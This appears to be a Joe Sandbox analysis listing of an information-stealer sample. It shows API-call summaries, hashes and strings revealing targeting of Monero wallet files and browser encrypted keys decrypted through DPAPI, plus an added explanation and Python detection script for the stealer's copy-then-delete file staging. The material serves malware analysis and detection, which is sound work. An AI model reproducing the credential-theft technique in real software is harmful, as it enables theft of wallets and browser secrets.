                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 5ee61e891705499cf5eae6ca687938664c034e3afe9e85dee0ce28c799b841d1
                  • Instruction ID: df10775cdff5b553fb23924ce887159cc65a51c2180a9aa15000667b855e7db3
                  • Opcode Fuzzy Hash: 5ee61e891705499cf5eae6ca687938664c034e3afe9e85dee0ce28c799b841d1
                  • Instruction Fuzzy Hash: 34E1FD72C10108ABDB14FBA4DEA2FEE733CAF94710F508159F516764A1EF306A49CB66
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B8B60: GetSystemTime.KERNEL32(009C0E1A,015EB008,009C05AE,?,?,009A13F9,?,0000001A,009C0E1A,00000000,?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009B8B86
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009AD481
                  • lstrlen.KERNEL32(00000000), ref: 009AD698
                  • lstrlen.KERNEL32(00000000), ref: 009AD6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 009AD72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 009bf4555a5656f65f0df43a19f88d6b69572ee8f0ab96cafdf051f77a96689c
                  • Instruction ID: 3cc46141faf7e3e9ac92440951821d80eb9099ecc0f6c9f6cb147efa81e04830
                  • Opcode Fuzzy Hash: 009bf4555a5656f65f0df43a19f88d6b69572ee8f0ab96cafdf051f77a96689c
                  • Instruction Fuzzy Hash: 97910172C10108AADB14FBA4DEA6FEE733CAF94710F504158F50776491EF346A09CB66
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B8B60: GetSystemTime.KERNEL32(009C0E1A,015EB008,009C05AE,?,?,009A13F9,?,0000001A,009C0E1A,00000000,?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009B8B86
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009AD801
                  • lstrlen.KERNEL32(00000000), ref: 009AD99F
                  • lstrlen.KERNEL32(00000000), ref: 009AD9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 009ADA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: baf733742fd4fedb1830ddb9ece55c83b5e5130dcd3f7de61d85911cbbd540e3
                  • Instruction ID: 0c3036ba009558235f875d7156f277aff5ecd646321db6f66a5c45220368124a
                  • Opcode Fuzzy Hash: baf733742fd4fedb1830ddb9ece55c83b5e5130dcd3f7de61d85911cbbd540e3
                  • Instruction Fuzzy Hash: 5C810171910108AADB14FBA4DEA6FEE733DAF94710F504118F507B64A1EF346A09CBA6
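The three functions above share one pattern: CopyFileA with bFailIfExists set copies a target file to a scratch path built from GetSystemTime (the subcall at 009B8B60), the copy is parsed in place (the lstrlen calls), and DeleteFileA removes it. Copying first is how stealers get around browsers holding their databases open with exclusive locks. On the endpoint this shows up as a burst of file-create/file-delete pairs for the same path by one process within seconds. The following detection logic is an added example written for this report, not code from the report or from the sample; the Sysmon-style events, the 30-second window and the two-hit threshold are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon-style events (not taken from the report). EID 11 is
# FileCreate, EID 26 is FileDeleteDetected; timestamps are UTC ISO-8601.
SAMPLE_EVENTS = [
    {"t": "2024-10-14T10:00:01", "eid": 11, "pid": 4120,
     "image": r"C:\Users\user\Desktop\file.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\20241014100001"},
    {"t": "2024-10-14T10:00:02", "eid": 26, "pid": 4120,
     "image": r"C:\Users\user\Desktop\file.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\20241014100001"},
    {"t": "2024-10-14T10:00:05", "eid": 11, "pid": 4120,
     "image": r"C:\Users\user\Desktop\file.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\20241014100005"},
    {"t": "2024-10-14T10:00:06", "eid": 26, "pid": 4120,
     "image": r"C:\Users\user\Desktop\file.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\20241014100005"},
    # Benign control: a browser creating a scratch file and removing it minutes later.
    {"t": "2024-10-14T10:01:00", "eid": 11, "pid": 880,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\scoped_dir880_1"},
    {"t": "2024-10-14T10:05:00", "eid": 26, "pid": 880,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\scoped_dir880_1"},
]


def copy_then_delete_bursts(events, window=timedelta(seconds=30), min_hits=2):
    """Pair each FileCreate with a later FileDelete of the same path by the same
    PID and report processes that do this at least `min_hits` times, each pair
    completing within `window`. Both thresholds are illustrative assumptions."""
    pending = {}                 # (pid, lower-cased path) -> (create time, image)
    hits = defaultdict(list)     # (image, pid) -> [deleted paths]
    for ev in sorted(events, key=lambda e: e["t"]):
        key = (ev["pid"], ev["target"].lower())
        ts = datetime.fromisoformat(ev["t"])
        if ev["eid"] == 11:
            pending[key] = (ts, ev["image"])
        elif ev["eid"] == 26 and key in pending:
            created, image = pending.pop(key)
            if ts - created <= window:
                hits[(image, ev["pid"])].append(ev["target"])
    return [(image, pid, paths) for (image, pid), paths in hits.items()
            if len(paths) >= min_hits]


if __name__ == "__main__":
    for image, pid, paths in copy_then_delete_bursts(SAMPLE_EVENTS):
        print(f"{image} (pid {pid}) staged and deleted {len(paths)} files: {paths}")
```

In production the same correlation is usually tightened with a parent-path filter (the staged copies land under the user's Temp directory) and an allow-list for browsers and installers, which legitimately create and delete scratch files but rarely in sub-second create/delete pairs.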
                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                    • Part of subcall function 009A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                    • Part of subcall function 009A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                    • Part of subcall function 009A99C0: ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                    • Part of subcall function 009A99C0: LocalFree.KERNEL32(009A148F), ref: 009A9A90
                    • Part of subcall function 009A99C0: CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                    • Part of subcall function 009B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009B8E52
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,009C1580,009C0D92), ref: 009AF54C
                  • lstrlen.KERNEL32(00000000), ref: 009AF56B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 9fdaae0e7f1ab65aa35b990ebf1cbb48c5e19bdf48c4319aa74fe41537249352
                  • Instruction ID: a6b511ca56663ce591a24d6f4cfc9eec7b8dd5abd4559799b6639f9ec532af03
                  • Opcode Fuzzy Hash: 9fdaae0e7f1ab65aa35b990ebf1cbb48c5e19bdf48c4319aa74fe41537249352
                  • Instruction Fuzzy Hash: EC511F71D10108BADB14FBA0DDA6EED737CAFD4710F408528F816A7191EE346A09CBA6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 1f8ca4772efbe02c332b7ef094812e8c51542df573d9c70350631b5ebad5a1d2
                  • Instruction ID: 6bb275bc550bc6085e94aee1d403acc1467f884031843312dfb600e4fdd0a35f
                  • Opcode Fuzzy Hash: 1f8ca4772efbe02c332b7ef094812e8c51542df573d9c70350631b5ebad5a1d2
                  • Instruction Fuzzy Hash: 84412D71D10109EBCB04EFA4DA96BEEB778AB84724F10C41CE41677290DB75AA45CFA2
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                    • Part of subcall function 009A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                    • Part of subcall function 009A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                    • Part of subcall function 009A99C0: ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                    • Part of subcall function 009A99C0: LocalFree.KERNEL32(009A148F), ref: 009A9A90
                    • Part of subcall function 009A99C0: CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                    • Part of subcall function 009B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009B8E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 009A9D39
                    • Part of subcall function 009A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9AEF
                    • Part of subcall function 009A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,009A4EEE,00000000,?), ref: 009A9B01
                    • Part of subcall function 009A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9B2A
                    • Part of subcall function 009A9AC0: LocalFree.KERNEL32(?,?,?,?,009A4EEE,00000000,?), ref: 009A9B3F
                    • Part of subcall function 009A9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009A9B84
                    • Part of subcall function 009A9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 009A9BA3
                    • Part of subcall function 009A9B60: LocalFree.KERNEL32(?), ref: 009A9BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 5146470568b2ceeff423995b11d84bfe4640d1e328df7e5b19181b2e21876364
                  • Instruction ID: 2ee6c0a0dfbe5f7db83f2a30b2da681b0c1f6e1cd8a012068a8a86ccf46dbe9e
                  • Opcode Fuzzy Hash: 5146470568b2ceeff423995b11d84bfe4640d1e328df7e5b19181b2e21876364
                  • Instruction Fuzzy Hash: 6D313DB6D10209ABCB04DFE4DD85BEFB7B8BB89304F144519F905A7281EB309A44CBA1
                  APIs
                  • memset.MSVCRT ref: 009B94EB
                    • Part of subcall function 009B8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009B951E,00000000), ref: 009B8D5B
                    • Part of subcall function 009B8D50: RtlAllocateHeap.NTDLL(00000000), ref: 009B8D62
                    • Part of subcall function 009B8D50: wsprintfW.USER32 ref: 009B8D78
                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 009B95AB
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009B95C9
                  • CloseHandle.KERNEL32(00000000), ref: 009B95D6
                  Yara matches
                  Similarity
                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                  • String ID:
                  • API String ID: 3729781310-0
                  • Opcode ID: 851eb8d69dde14cfa1a87c2b020eff5e65da2b0a9f8814f8283cc04eb1c69812
                  • Instruction ID: 6f1c7710762b97d35c6a049acdb8a85613ee4cdbd5e2145965f345a18d745605
                  • Opcode Fuzzy Hash: 851eb8d69dde14cfa1a87c2b020eff5e65da2b0a9f8814f8283cc04eb1c69812
                  • Instruction Fuzzy Hash: B1310C71A5024CAFDB14DBE0CD89BEDB778EF44710F104459F606AF184DBB4AA89CB51
                  APIs
                  • CreateFileA.KERNEL32(009B3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,009B3AEE,?), ref: 009B92FC
                  • GetFileSizeEx.KERNEL32(000000FF,009B3AEE), ref: 009B9319
                  • CloseHandle.KERNEL32(000000FF), ref: 009B9327
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: 7f7d693048831bbbfc23b490a0170315425cd264262626abb7229cbc8379b344
                  • Instruction ID: 2c376c45bbd73868b013323a7bb9c02a1a7912aabd1b5225ac4396669fc04cd0
                  • Opcode Fuzzy Hash: 7f7d693048831bbbfc23b490a0170315425cd264262626abb7229cbc8379b344
                  • Instruction Fuzzy Hash: 3DF03775E54208BBDF10DBB0DD99B9E77F9AB48720F10C658BA51AB2C0DA74AA018B50
                  APIs
                  • __getptd.LIBCMT ref: 009BC74E
                    • Part of subcall function 009BBF9F: __amsg_exit.LIBCMT ref: 009BBFAF
                  • __getptd.LIBCMT ref: 009BC765
                  • __amsg_exit.LIBCMT ref: 009BC773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 009BC797
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 5bbe2dbff79b50e5bc9fb6ddd96a045a6d4f2773b3cbaa82eb7009dbfb33e351
                  • Instruction ID: 589e941d042d06aa1fb3aa0c7ad51bc8d841d89f4f9ab0438cc668739b6b151e
                  • Opcode Fuzzy Hash: 5bbe2dbff79b50e5bc9fb6ddd96a045a6d4f2773b3cbaa82eb7009dbfb33e351
                  • Instruction Fuzzy Hash: 84F0B472D047049BD721BBB89A47BED33A06F80735F244149F454B61D2CFA459409F56
                  APIs
                    • Part of subcall function 009B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4F7A
                  • lstrcat.KERNEL32(?,009C1070), ref: 009B4F97
                  • lstrcat.KERNEL32(?,015E9E78), ref: 009B4FAB
                  • lstrcat.KERNEL32(?,009C1074), ref: 009B4FBD
                    • Part of subcall function 009B4910: wsprintfA.USER32 ref: 009B492C
                    • Part of subcall function 009B4910: FindFirstFileA.KERNEL32(?,?), ref: 009B4943
                    • Part of subcall function 009B4910: StrCmpCA.SHLWAPI(?,009C0FDC), ref: 009B4971
                    • Part of subcall function 009B4910: StrCmpCA.SHLWAPI(?,009C0FE0), ref: 009B4987
                    • Part of subcall function 009B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009B4B7D
                    • Part of subcall function 009B4910: FindClose.KERNEL32(000000FF), ref: 009B4B92
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: f96bb8f5e03f806d1fc0a8cb7b902e2ef7907121b9adf7b7d6e4897c18853be1
                  • Instruction ID: 9e974f3703d0987ec14098d9fdd49bda155fd0f40633201b44d53a921b63a203
                  • Opcode Fuzzy Hash: f96bb8f5e03f806d1fc0a8cb7b902e2ef7907121b9adf7b7d6e4897c18853be1
                  • Instruction Fuzzy Hash: 5621867A900208A7C754FBA0DD86FEA337CABD4700F004558B65997181EE74AAC8CBA2